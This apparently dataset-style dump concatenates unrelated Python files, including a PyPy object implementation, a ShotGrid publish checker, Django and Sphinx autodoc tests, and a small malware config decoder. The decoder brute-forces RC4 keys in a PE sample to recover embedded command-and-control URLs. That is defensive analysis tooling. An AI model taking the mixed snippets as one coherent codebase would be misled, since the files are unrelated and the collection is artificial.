slotnames(cls): if not isinstance(cls, type): return None try: return cls.__dict__["__slotnames__"] except KeyError: pass import copyreg slotnames = copyreg._slotnames(cls) if not isinstance(slotnames, list) and slotnames is not None: raise TypeError("copyreg._slotnames didn't return a list or None") return slotnames ''', filename=__file__) _abstract_method_error = app.interphook("_abstract_method_error") reduce_1 = app.interphook('reduce_1') reduce_2 = app.interphook('reduce_2') class W_ObjectObject(W_Root): """Instances of this class are what the user can directly see with an 'object()' call.""" def _excess_args(__args__): return bool(__args__.arguments_w) or bool(__args__.keywords) def descr__new__(space, w_type, __args__): from pypy.objspace.std.typeobject import _precheck_for_new w_type = _precheck_for_new(space, w_type) if _excess_args(__args__): w_parent_new, _ = space.lookup_in_type_where(w_type, '__new__') w_parent_init, _ = space.lookup_in_type_where(w_type, '__init__') w_parent_new, _ = space.lookup_in_type_where(w_type, '__new__') if (w_parent_init is space.w_object or w_parent_new is not space.w_object): raise oefmt(space.w_TypeError, "object() takes no parameters") if w_type.is_abstract(): _abstract_method_error(space, w_type) return space.allocate_instance(W_ObjectObject, w_type) def descr___subclasshook__(space, __args__): return space.w_NotImplemented def descr__init__(space, w_obj, __args__): if _excess_args(__args__): w_type = space.type(w_obj) w_parent_init, _ = space.lookup_in_type_where(w_type, '__init__') w_parent_new, _ = space.lookup_in_type_where(w_type, '__new__') w_parent_init, _ = space.lookup_in_type_where(w_type, '__init__') if (w_parent_new is space.w_object or w_parent_init is not space.w_object): raise oefmt(space.w_TypeError, "object.__init__() takes no parameters") def descr_get___class__(space, w_obj): return space.type(w_obj) def descr_set___class__(space, w_obj, w_newcls): from pypy.objspace.std.typeobject import W_TypeObject 
from pypy.interpreter.module import Module # if not isinstance(w_newcls, W_TypeObject): raise oefmt(space.w_TypeError, "__class__ must be set to a class, not '%T' " "object", w_newcls) if not (w_newcls.is_heaptype() or w_newcls is space.gettypeobject(Module.typedef)): raise oefmt(space.w_TypeError, "__class__ assignment only supported for heap types " "or ModuleType subclasses") w_oldcls = space.type(w_obj) assert isinstance(w_oldcls, W_TypeObject) if (w_oldcls.get_full_instance_layout() == w_newcls.get_full_instance_layout()): w_obj.setclass(space, w_newcls) else: raise oefmt(space.w_TypeError, "__class__ assignment: '%N' object layout differs from " "'%N'", w_oldcls, w_newcls) def descr__repr__(space, w_obj): classname = space.getfulltypename(w_obj) return w_obj.getrepr(space, u'%s object' % (classname,)) def descr__str__(space, w_obj): w_type = space.type(w_obj) w_impl = w_type.lookup("__repr__") if w_impl is None: # can it really occur? raise oefmt(space.w_TypeError, "operand does not support unary str") return space.get_and_call_function(w_impl, w_obj) def _getnewargs(space, w_obj): w_descr = space.lookup(w_obj, '__getnewargs_ex__') hasargs = True if w_descr is not None: w_result = space.get_and_call_function(w_descr, w_obj) if not space.isinstance_w(w_result, space.w_tuple): raise oefmt(space.w_TypeError, "__getnewargs_ex__ should return a tuple, not '%T'", w_result) n = space.len_w(w_result) if n != 2: raise oefmt(space.w_ValueError, "__getnewargs_ex__ should return a tuple of length 2, not %d", n) w_args, w_kwargs = space.fixedview(w_result, 2) if not space.isinstance_w(w_args, space.w_tuple): raise oefmt(space.w_TypeError, "first item of the tuple returned by __getnewargs_ex__ must " "be a tuple, not '%T'", w_args) if not space.isinstance_w(w_kwargs, space.w_dict): raise oefmt(space.w_TypeError, "second item of the tuple returned by __getnewargs_ex__ must " "be a dict, not '%T'", w_kwargs) else: w_descr = space.lookup(w_obj, '__getnewargs__') if w_descr is 
not None: w_args = space.get_and_call_function(w_descr, w_obj) if not space.isinstance_w(w_args, space.w_tuple): raise oefmt(space.w_TypeError, "__getnewargs__ should return a tuple, not '%T'", w_args) else: hasargs = False w_args = space.newtuple([]) w_kwargs = space.w_None return hasargs, w_args, w_kwargs @unwrap_spec(proto=int) def descr__reduce__(space, w_obj, proto=0): w_proto = space.newint(proto) if proto >= 2: hasargs, w_args, w_kwargs = _getnewargs(space, w_obj) w_getstate = space.lookup(w_obj, '__get_state__') if w_getstate is None: required = (not hasargs and not space.isinstance_w(w_obj, space.w_list) and not space.isinstance_w(w_obj, space.w_dict)) w_obj_type = space.type(w_obj) if required and w_obj_type.layout.typedef.variable_sized: raise oefmt( space.w_TypeError, "cannot pickle %N objects", w_obj_type) return reduce_2(space, w_obj, w_proto, w_args, w_kwargs) return reduce_1(space, w_obj, w_proto) @unwrap_spec(proto=int) def descr__reduce_ex__(space, w_obj, proto=0): w_st_reduce = space.newtext('__reduce__') w_reduce = space.findattr(w_obj, w_st_reduce) if w_reduce is not None: # Check if __reduce__ has been overridden: # "type(obj).__reduce__ is not object.__reduce__" w_cls_reduce = space.getattr(space.type(w_obj), w_st_reduce) w_obj_reduce = space.getattr(space.w_object, w_st_reduce) override = not space.is_w(w_cls_reduce, w_obj_reduce) if override: return space.call_function(w_reduce) return descr__reduce__(space, w_obj, proto) def descr___format__(space, w_obj, w_format_spec): if space.isinstance_w(w_format_spec, space.w_unicode): w_as_str = space.call_function(space.w_unicode, w_obj) elif space.isinstance_w(w_format_spec, space.w_bytes): w_as_str = space.str(w_obj) else: raise oefmt(space.w_TypeError, "format_spec must be a string") if space.len_w(w_format_spec) > 0: raise oefmt(space.w_TypeError, "unsupported format string passed to %T.__format__", w_obj); return space.format(w_as_str, w_format_spec) def descr__eq__(space, w_self, w_other): if 
space.is_w(w_self, w_other): return space.w_True # Return NotImplemented instead of False, so if two objects are # compared, both get a chance at the comparison (issue #1393) return space.w_NotImplemented def descr__ne__(space, w_self, w_other): # By default, __ne__() delegates to __eq__() and inverts the result, # unless the latter returns NotImplemented. w_eq = space.lookup(w_self, '__eq__') w_res = space.get_and_call_function(w_eq, w_self, w_other) if space.is_w(w_res, space.w_NotImplemented): return w_res return space.not_(w_res) def descr_richcompare(space, w_self, w_other): return space.w_NotImplemented def descr__dir__(space, w_obj): from pypy.objspace.std.util import _objectdir return space.call_function(space.w_list, _objectdir(space, w_obj)) W_ObjectObject.typedef = TypeDef("object", _text_signature_='()', __doc__ = "The most base type", __new__ = interp2app(descr__new__), __subclasshook__ = interp2app(descr___subclasshook__, as_classmethod=True), # these are actually implemented in pypy.objspace.descroperation __getattribute__ = interp2app(Object.descr__getattribute__.im_func), __setattr__ = interp2app(Object.descr__setattr__.im_func), __delattr__ = interp2app(Object.descr__delattr__.im_func), __init__ = interp2app(descr__init__), __class__ = GetSetProperty(descr_get___class__, descr_set___class__), __repr__ = interp2app(descr__repr__), __str__ = interp2app(descr__str__), __hash__ = interp2app(default_identity_hash), __reduce__ = interp2app(descr__reduce__), __reduce_ex__ = interp2app(descr__reduce_ex__), __format__ = interp2app(descr___format__), __dir__ = interp2app(descr__dir__), __eq__ = interp2app(descr__eq__), __ne__ = interp2app(descr__ne__), __le__ = interp2app(descr_richcompare), __lt__ = interp2app(descr_richcompare), __ge__ = interp2app(descr_richcompare), __gt__ = interp2app(descr_richcompare), )
nilq/baby-python
python
import collections

from sgfs import SGFS

# One row per checked path:
#   path      - the filesystem path that was checked
#   used      - the PublishEvent the path belongs to (or None)
#   latest    - the highest-versioned sibling publish (or None)
#   is_latest - True when `used` is that latest sibling
#   all       - every sibling publish, sorted by version ascending
ReferenceStatus = collections.namedtuple('ReferenceStatus', ('path', 'used', 'latest', 'is_latest', 'all'))


def check_paths(paths, only_published=True):
    """Resolve each path to its PublishEvent and report whether it is
    the newest version of that publish stream.

    :param paths: iterable of filesystem paths to check.
    :param only_published: when True, silently skip paths that do not
        belong to any publish.
    :return: list of :class:`ReferenceStatus` tuples.
    """
    sgfs = SGFS()
    res = []
    for path in paths:
        publishes = sgfs.entities_from_path(path, 'PublishEvent')
        if only_published and not publishes:
            continue
        publish = publishes[0] if publishes else None
        if publish:
            # Fetch every version of this publish stream.  'sg_version'
            # is requested explicitly because the sort/max below read
            # it (previously only 'sg_path' was fetched).
            siblings = sgfs.session.find('PublishEvent', [
                ('sg_link', 'is', publish['sg_link']),
                ('code', 'is', publish['code']),
                ('sg_type', 'is', publish['sg_type']),
            ], ['sg_path', 'sg_version'])
            siblings.sort(key=lambda x: x['sg_version'])
            # Guard against an (unexpected) empty result instead of
            # letting max() raise on an empty sequence.
            latest = (max(siblings, key=lambda pub: pub['sg_version'])
                      if siblings else None)
        else:
            siblings = []
            latest = None
        res.append(ReferenceStatus(
            path=path,
            used=publish,
            latest=latest,
            # NOTE(review): identity comparison assumes the session
            # returns the same entity object for `publish` — confirm
            # sgfs caches/merges entities.
            is_latest=publish is latest if publish else False,
            all=siblings,
        ))
    return res
nilq/baby-python
python
'''
Written by Jason Reaves - @sysopfb

Free to use, attribute properly.
'''
import sys
import pefile
import struct
import re


def decrypt(keystream, blob):
    """XOR *blob* in place with the repeating *keystream* (both must be
    mutable byte sequences, e.g. bytearray)."""
    for i in range(len(blob)):
        blob[i] ^= keystream[i % len(keystream)]


def rc4_crypt(data, sbox):
    """RC4 PRGA using the already-initialised 256-entry S-box *sbox*;
    returns *data* XORed with the generated keystream."""
    S = list(sbox)
    out = []
    i = j = 0
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
    return ''.join(out)


def decoder(data):
    """Extract the C2 URL config from a PE sample.

    Scans .rdata for an RC4 blob whose trailing (or a standalone)
    0x100 bytes form the S-box.  Returns {'urls': [...]} on success,
    else None.  NOTE(review): written for Python 2 str semantics
    (section names / data are handled as str).
    """
    conf = None
    #m = re.findall('''\x8a[\x82\x86]([\x00-\xff]{3}\x00)''', data)
    blob = None
    pe = pefile.PE(data=data)
    for section in pe.sections:
        if '.rdata' in section.Name:
            blob = section.get_data()
    if blob != None:
        # Candidate chunks are runs separated by 3+ NUL bytes.  The
        # filtered candidates are materialised into lists so they can
        # be iterated more than once: a bare filter() is a one-shot
        # iterator on Python 3, which exhausted possible_data after
        # the first key was tried (and temp after the first loop).
        temp = re.split('[\x00]{3,}', blob)
        temp = list(filter(lambda x: len(x) > 254, temp))
        found = None
        # First pass: assume key is appended to the encrypted data.
        for val in temp:
            testdata = val[:-0x100]
            testkey = val[-0x100:]
            test = rc4_crypt(testdata, bytearray(testkey))
            if 'http' in test:
                found = test
                break
        if found == None:
            # Second pass: try every standalone 256-byte chunk as the
            # key against every other chunk.
            possible_keys = list(filter(lambda x: len(x) == 256, temp))
            possible_data = list(filter(lambda x: len(x) != 256, temp))
            for testkey in possible_keys:
                for testdata in possible_data:
                    test = rc4_crypt(testdata, bytearray(testkey))
                    if 'http' in test:
                        found = test
                        break
                if found != None:
                    break
        if found != None:
            print("Found embed config!")
            urls = re.findall('https?:\/\/[a-zA-Z0-9\-\/\._]+', found)
            conf = {'urls': urls}
    return conf


if __name__ == "__main__":
    data = open(sys.argv[1], 'rb').read()
    t = decoder(data)
    print(t)
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- __title__ = 'baidupcsapi' __version__ = '0.2.12' __author__ = 'mozillazg,latyas' __license__ = 'MIT' from .api import PCS
nilq/baby-python
python
import inspect

class SuperMixin(object):
    """Mixin providing ``cls.super(...)``: call the same-named method
    on the superclass without repeating the method name.

    NOTE(review): relies on ``inspect.currentframe(1)`` and on the
    calling method binding its instance to a local named ``self`` —
    CPython-specific frame introspection; confirm before reuse.
    """
    def super(cls, *args, **kwargs):
        # Inspect the caller's frame to learn which method invoked us
        # and on which instance.
        frame = inspect.currentframe(1)
        self = frame.f_locals['self']
        methodName = frame.f_code.co_name
        # Resolve the method on the superclass; silently does nothing
        # (returns None) when no ancestor defines it.
        method = getattr(super(cls, self), methodName, None)
        if inspect.ismethod(method):
            return method(*args, **kwargs)
    # Pre-2.4-style decoration: make `super` a classmethod.
    super = classmethod(super)
nilq/baby-python
python
#Includes BaseClassApi class import BaseClassApi class Augmentor(BaseClassApi.Api): pass #print "This is augmentor api class: \n" def execute_augmentor_api(): BaseClassApi.Api.url_path = "api/v1/augmentors" aug_api = Augmentor() #This module gives list of organizations available. aug_api.list_operation() #This module uploads file i.e. json data and returns upload id. #BaseClassApi.Api.upload_id = aug_api.upload_file_operation(json_file_name) #This is the payload information which is required for creating organization. ## #BaseClassApi.Api.payload = {"organization": {"name": "New organization1", "url": "www.test1.com", "upload_id": "%s" %BaseClassApi.Api.upload_id }} BaseClassApi.Api.payload = {"augmentor": {"name" : "audience name" , "upload_id":"%s" %BaseClassApi.Api.upload_id}} #This module creates organization. BaseClassApi.Api.aug_id = aug_api.create_operation() #BaseClassApi.Api.general_id = "" #This is the payload information which is required for updating organization. ## BaseClassApi.Api.payload = {"organization": {"name": "Rename organization1", "url": "www.test1.com", "upload_id": "%s" %BaseClassApi.Api.upload_id }} BaseClassApi.Api.payload = {"augmentor": {"name" : "audience name" , "upload_id":"%s" %BaseClassApi.Api.upload_id}} #This module updates organization. aug_api.update_operation(BaseClassApi.Api.aug_id) #This module gives details of specific organization aug_api.show_operation(BaseClassApi.Api.aug_id) #This module deletes organization ######################## #aug_api.destroy_operation(BaseClassApi.Api.aug_id)
nilq/baby-python
python
from ..abstract import ErdReadOnlyConverter
from ..primitives import *
from gehomesdk.erd.values.oven import OvenConfiguration, ErdOvenConfiguration

class OvenConfigurationConverter(ErdReadOnlyConverter[OvenConfiguration]):
    def erd_decode(self, value: str) -> OvenConfiguration:
        """Decode the raw ERD string into an OvenConfiguration, treating
        an empty value as "no capabilities set"."""
        bits = erd_decode_int(value) if value else 0

        def has_bit(mask: ErdOvenConfiguration) -> bool:
            # Each capability occupies a single bit of the packed int.
            return bool(bits & mask.value)

        return OvenConfiguration(
            has_knob=has_bit(ErdOvenConfiguration.HAS_KNOB),
            has_warming_drawer=has_bit(ErdOvenConfiguration.HAS_WARMING_DRAWER),
            has_light_bar=has_bit(ErdOvenConfiguration.HAS_LIGHT_BAR),
            has_lower_oven=has_bit(ErdOvenConfiguration.HAS_LOWER_OVEN),
            has_lower_oven_kitchen_timer=has_bit(ErdOvenConfiguration.HAS_LOWER_OVEN_KITCHEN_TIMER),
            raw_value=value,
        )
nilq/baby-python
python
from __future__ import unicode_literals import datetime from django.http import Http404 from django.utils.timezone import utc from model_mommy import mommy from kb.tests.test import ViewTestCase from kb.models import Article class TestCategoryFeed(ViewTestCase): view_name = 'kb:category_feed' view_kwargs = {'slug': 'spam'} def view(self, request): from kb.feeds import CategoryFeed return CategoryFeed()(request, slug='spam') def test_with_category_without_articles_should_fail(self): mommy.make_recipe('kb.tests.category_without_articles', slug='spam') self.assertRaises(Http404, self.get) def test_view(self): category = mommy.make_recipe('kb.tests.category_with_articles', slug='spam') mommy.make_recipe('kb.tests.published_article', created=datetime.datetime(2013, 5, 27, tzinfo=utc), created_by=mommy.make('User', username='Guido'), category=category) for article in Article.objects.all(): article.tags.add('Spam', 'Eggs') response = self.get() self.assertHttpOK(response) self.assertContains(response, '<title>Category With Articles Title</title>') self.assertContains(response, '<description>Category With Articles Description</description>') self.assertContains(response, '<title>Published Article Title</title>') self.assertContains(response, '<description>&lt;p&gt;Published Article Content&lt;/p&gt;</description>') self.assertContains(response, '<pubDate>Mon, 27 May 2013 00:00:00 +0000</pubDate>') self.assertContains(response, '<category>Spam</category>') self.assertContains(response, '<category>Eggs</category>') self.assertContains(response, '>Guido</dc:creator>') self.assertNotContains(response, '<title>Draft Article Title</title>') self.assertNotContains(response, '<title>Draft Article Content</title>')
nilq/baby-python
python
""" test_ext_autodoc_configs ~~~~~~~~~~~~~~~~~~~~~~~~ Test the autodoc extension. This tests mainly for config variables :copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS. :license: BSD, see LICENSE for details. """ import platform import sys import pytest from sphinx.testing import restructuredtext from .test_ext_autodoc import do_autodoc IS_PYPY = platform.python_implementation() == 'PyPy' @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_class(app): app.config.autoclass_content = 'class' options = {"members": None} actual = do_autodoc(app, 'module', 'target.autoclass_content', options) assert list(actual) == [ '', '.. py:module:: target.autoclass_content', '', '', '.. py:class:: A()', ' :module: target.autoclass_content', '', ' A class having no __init__, no __new__', '', '', '.. py:class:: B()', ' :module: target.autoclass_content', '', ' A class having __init__(no docstring), no __new__', '', '', '.. py:class:: C()', ' :module: target.autoclass_content', '', ' A class having __init__, no __new__', '', '', '.. py:class:: D()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__(no docstring)', '', '', '.. py:class:: E()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__', '', '', '.. py:class:: F()', ' :module: target.autoclass_content', '', ' A class having both __init__ and __new__', '', '', '.. py:class:: G()', ' :module: target.autoclass_content', '', ' A class inherits __init__ without docstring.', '', '', '.. py:class:: H()', ' :module: target.autoclass_content', '', ' A class inherits __new__ without docstring.', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_init(app): app.config.autoclass_content = 'init' options = {"members": None} actual = do_autodoc(app, 'module', 'target.autoclass_content', options) assert list(actual) == [ '', '.. py:module:: target.autoclass_content', '', '', '.. 
py:class:: A()', ' :module: target.autoclass_content', '', ' A class having no __init__, no __new__', '', '', '.. py:class:: B()', ' :module: target.autoclass_content', '', ' A class having __init__(no docstring), no __new__', '', '', '.. py:class:: C()', ' :module: target.autoclass_content', '', ' __init__ docstring', '', '', '.. py:class:: D()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__(no docstring)', '', '', '.. py:class:: E()', ' :module: target.autoclass_content', '', ' __new__ docstring', '', '', '.. py:class:: F()', ' :module: target.autoclass_content', '', ' __init__ docstring', '', '', '.. py:class:: G()', ' :module: target.autoclass_content', '', ' __init__ docstring', '', '', '.. py:class:: H()', ' :module: target.autoclass_content', '', ' __new__ docstring', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_both(app): app.config.autoclass_content = 'both' options = {"members": None} actual = do_autodoc(app, 'module', 'target.autoclass_content', options) assert list(actual) == [ '', '.. py:module:: target.autoclass_content', '', '', '.. py:class:: A()', ' :module: target.autoclass_content', '', ' A class having no __init__, no __new__', '', '', '.. py:class:: B()', ' :module: target.autoclass_content', '', ' A class having __init__(no docstring), no __new__', '', '', '.. py:class:: C()', ' :module: target.autoclass_content', '', ' A class having __init__, no __new__', '', ' __init__ docstring', '', '', '.. py:class:: D()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__(no docstring)', '', '', '.. py:class:: E()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__', '', ' __new__ docstring', '', '', '.. py:class:: F()', ' :module: target.autoclass_content', '', ' A class having both __init__ and __new__', '', ' __init__ docstring', '', '', '.. 
py:class:: G()', ' :module: target.autoclass_content', '', ' A class inherits __init__ without docstring.', '', ' __init__ docstring', '', '', '.. py:class:: H()', ' :module: target.autoclass_content', '', ' A class inherits __new__ without docstring.', '', ' __new__ docstring', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_inherit_docstrings(app): assert app.config.autodoc_inherit_docstrings is True # default actual = do_autodoc(app, 'method', 'target.inheritance.Derived.inheritedmeth') assert list(actual) == [ '', '.. py:method:: Derived.inheritedmeth()', ' :module: target.inheritance', '', ' Inherited function.', '', ] # disable autodoc_inherit_docstrings app.config.autodoc_inherit_docstrings = False actual = do_autodoc(app, 'method', 'target.inheritance.Derived.inheritedmeth') assert list(actual) == [ '', '.. py:method:: Derived.inheritedmeth()', ' :module: target.inheritance', '' ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_docstring_signature(app): options = {"members": None} actual = do_autodoc(app, 'class', 'target.DocstringSig', options) assert list(actual) == [ '', '.. py:class:: DocstringSig()', ' :module: target', '', '', ' .. py:method:: DocstringSig.meth(FOO, BAR=1) -> BAZ', ' :module: target', '', ' First line of docstring', '', ' rest of docstring', '', '', ' .. py:method:: DocstringSig.meth2()', ' :module: target', '', ' First line, no signature', ' Second line followed by indentation::', '', ' indented line', '', '', ' .. py:property:: DocstringSig.prop1', ' :module: target', '', ' First line of docstring', '', '', ' .. py:property:: DocstringSig.prop2', ' :module: target', '', ' First line of docstring', ' Second line of docstring', '', ] # disable autodoc_docstring_signature app.config.autodoc_docstring_signature = False actual = do_autodoc(app, 'class', 'target.DocstringSig', options) assert list(actual) == [ '', '.. py:class:: DocstringSig()', ' :module: target', '', '', ' .. 
py:method:: DocstringSig.meth()', ' :module: target', '', ' meth(FOO, BAR=1) -> BAZ', ' First line of docstring', '', ' rest of docstring', '', '', '', ' .. py:method:: DocstringSig.meth2()', ' :module: target', '', ' First line, no signature', ' Second line followed by indentation::', '', ' indented line', '', '', ' .. py:property:: DocstringSig.prop1', ' :module: target', '', ' DocstringSig.prop1(self)', ' First line of docstring', '', '', ' .. py:property:: DocstringSig.prop2', ' :module: target', '', ' First line of docstring', ' Second line of docstring', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_and_docstring_signature_class(app): app.config.autoclass_content = 'class' options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.docstring_signature', options) assert list(actual) == [ '', '.. py:module:: target.docstring_signature', '', '', '.. py:class:: A(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: B(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: C(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: D()', ' :module: target.docstring_signature', '', '', '.. py:class:: E()', ' :module: target.docstring_signature', '', '', '.. py:class:: F()', ' :module: target.docstring_signature', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_and_docstring_signature_init(app): app.config.autoclass_content = 'init' options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.docstring_signature', options) assert list(actual) == [ '', '.. py:module:: target.docstring_signature', '', '', '.. py:class:: A(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: B(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: C(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. 
py:class:: D(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: E(foo: int, bar: int, baz: int) -> None', ' E(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', '', '.. py:class:: F(foo: int, bar: int, baz: int) -> None', ' F(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_and_docstring_signature_both(app): app.config.autoclass_content = 'both' options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.docstring_signature', options) assert list(actual) == [ '', '.. py:module:: target.docstring_signature', '', '', '.. py:class:: A(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: B(foo, bar)', ' :module: target.docstring_signature', '', ' B(foo, bar, baz)', '', '', '.. py:class:: C(foo, bar)', ' :module: target.docstring_signature', '', ' C(foo, bar, baz)', '', '', '.. py:class:: D(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: E(foo: int, bar: int, baz: int) -> None', ' E(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', '', '.. 
py:class:: F(foo: int, bar: int, baz: int) -> None', ' F(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') @pytest.mark.usefixtures("rollback_sysmodules") def test_mocked_module_imports(app, warning): sys.modules.pop('target', None) # unload target module to clear the module cache # no autodoc_mock_imports options = {"members": 'TestAutodoc,decoratedFunction,func'} actual = do_autodoc(app, 'module', 'target.need_mocks', options) assert list(actual) == [] assert "autodoc: failed to import module 'need_mocks'" in warning.getvalue() # with autodoc_mock_imports app.config.autodoc_mock_imports = [ 'missing_module', 'missing_package1', 'missing_package2', 'missing_package3', 'sphinx.missing_module4', ] warning.truncate(0) actual = do_autodoc(app, 'module', 'target.need_mocks', options) assert list(actual) == [ '', '.. py:module:: target.need_mocks', '', '', '.. py:class:: TestAutodoc()', ' :module: target.need_mocks', '', ' TestAutodoc docstring.', '', '', ' .. py:method:: TestAutodoc.decoratedMethod()', ' :module: target.need_mocks', '', ' TestAutodoc::decoratedMethod docstring', '', '', '.. py:function:: decoratedFunction()', ' :module: target.need_mocks', '', ' decoratedFunction docstring', '', '', '.. py:function:: func(arg: missing_module.Class)', ' :module: target.need_mocks', '', ' a function takes mocked object as an argument', '', ] assert warning.getvalue() == '' @pytest.mark.sphinx('html', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "signature"}) def test_autodoc_typehints_signature(app): options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.typehints', options) assert list(actual) == [ '', '.. py:module:: target.typehints', '', '', '.. py:class:: Math(s: str, o: Optional[Any] = None)', ' :module: target.typehints', '', '', ' .. 
py:method:: Math.decr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', ' .. py:method:: Math.horse(a: str, b: int) -> None', ' :module: target.typehints', '', '', ' .. py:method:: Math.incr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', ' .. py:method:: Math.nothing() -> None', ' :module: target.typehints', '', '', '.. py:class:: NewAnnotation(i: int)', ' :module: target.typehints', '', '', '.. py:class:: NewComment(i: int)', ' :module: target.typehints', '', '', '.. py:class:: SignatureFromMetaclass(a: int)', ' :module: target.typehints', '', '', '.. py:function:: complex_func(arg1: str, arg2: List[int], arg3: Tuple[int, ' 'Union[str, Unknown]] = None, *args: str, **kwargs: str) -> None', ' :module: target.typehints', '', '', '.. py:function:: decr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', '.. py:function:: incr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', '.. py:function:: missing_attr(c, a: str, b: Optional[str] = None) -> str', ' :module: target.typehints', '', '', '.. py:function:: tuple_args(x: Tuple[int, Union[int, str]]) -> Tuple[int, int]', ' :module: target.typehints', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "none"}) def test_autodoc_typehints_none(app): options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.typehints', options) assert list(actual) == [ '', '.. py:module:: target.typehints', '', '', '.. py:class:: Math(s, o=None)', ' :module: target.typehints', '', '', ' .. py:method:: Math.decr(a, b=1)', ' :module: target.typehints', '', '', ' .. py:method:: Math.horse(a, b)', ' :module: target.typehints', '', '', ' .. py:method:: Math.incr(a, b=1)', ' :module: target.typehints', '', '', ' .. py:method:: Math.nothing()', ' :module: target.typehints', '', '', '.. py:class:: NewAnnotation(i)', ' :module: target.typehints', '', '', '.. 
py:class:: NewComment(i)', ' :module: target.typehints', '', '', '.. py:class:: SignatureFromMetaclass(a)', ' :module: target.typehints', '', '', '.. py:function:: complex_func(arg1, arg2, arg3=None, *args, **kwargs)', ' :module: target.typehints', '', '', '.. py:function:: decr(a, b=1)', ' :module: target.typehints', '', '', '.. py:function:: incr(a, b=1)', ' :module: target.typehints', '', '', '.. py:function:: missing_attr(c, a, b=None)', ' :module: target.typehints', '', '', '.. py:function:: tuple_args(x)', ' :module: target.typehints', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc', confoverrides={'autodoc_typehints': 'none'}) def test_autodoc_typehints_none_for_overload(app): options = {"members": None} actual = do_autodoc(app, 'module', 'target.overload', options) assert list(actual) == [ '', '.. py:module:: target.overload', '', '', '.. py:class:: Bar(x, y)', ' :module: target.overload', '', ' docstring', '', '', '.. py:class:: Baz(x, y)', ' :module: target.overload', '', ' docstring', '', '', '.. py:class:: Foo(x, y)', ' :module: target.overload', '', ' docstring', '', '', '.. py:class:: Math()', ' :module: target.overload', '', ' docstring', '', '', ' .. py:method:: Math.sum(x, y=None)', ' :module: target.overload', '', ' docstring', '', '', '.. 
py:function:: sum(x, y=None)', ' :module: target.overload', '', ' docstring', '', ] @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description"}) def test_autodoc_typehints_description(app): app.build() context = (app.outdir / 'index.txt').read_text() assert ('target.typehints.incr(a, b=1)\n' '\n' ' Parameters:\n' ' * **a** (*int*) --\n' '\n' ' * **b** (*int*) --\n' '\n' ' Return type:\n' ' int\n' in context) assert ('target.typehints.tuple_args(x)\n' '\n' ' Parameters:\n' ' **x** (*Tuple**[**int**, **Union**[**int**, **str**]**]*) --\n' '\n' ' Return type:\n' ' Tuple[int, int]\n' in context) # Overloads still get displyed in the signature assert ('target.overload.sum(x: int, y: int = 0) -> int\n' 'target.overload.sum(x: float, y: float = 0.0) -> float\n' 'target.overload.sum(x: str, y: str = None) -> str\n' '\n' ' docstring\n' in context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description", 'autodoc_typehints_description_target': 'documented'}) def test_autodoc_typehints_description_no_undoc(app): # No :type: or :rtype: will be injected for `incr`, which does not have # a description for its parameters or its return. `tuple_args` does # describe them, so :type: and :rtype: will be added. (app.srcdir / 'index.rst').write_text( '.. autofunction:: target.typehints.incr\n' '\n' '.. 
